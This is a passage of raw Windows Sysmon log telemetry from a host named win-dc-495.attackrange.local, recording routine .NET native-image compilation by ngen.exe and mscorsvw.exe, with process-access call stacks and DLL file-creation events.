13:47:34.655{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1240-0\System.Net.Http.WebRequest.dll2021-01-18 13:47:34.655 10341000x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.624{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.624{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.624{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.577{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-8F02-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-8F02-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-8F02-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.499{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\2d8-0\System.Net.dll2021-01-18 13:47:34.499 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.171{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.171{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-8D02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.093{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-8D02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-8D02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.031{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\324-0\System.Messaging.dll2021-01-18 13:47:34.031 10341000x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.499{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.499{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.499{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.030{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9177-6005-9302-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9177-6005-9302-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9177-6005-9302-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.827{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.827{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.780{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9702-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.780{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9702-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.780{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9702-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:36.718{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c8-0\System.Reflection.Context.dll2021-01-18 13:47:36.718 10341000x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 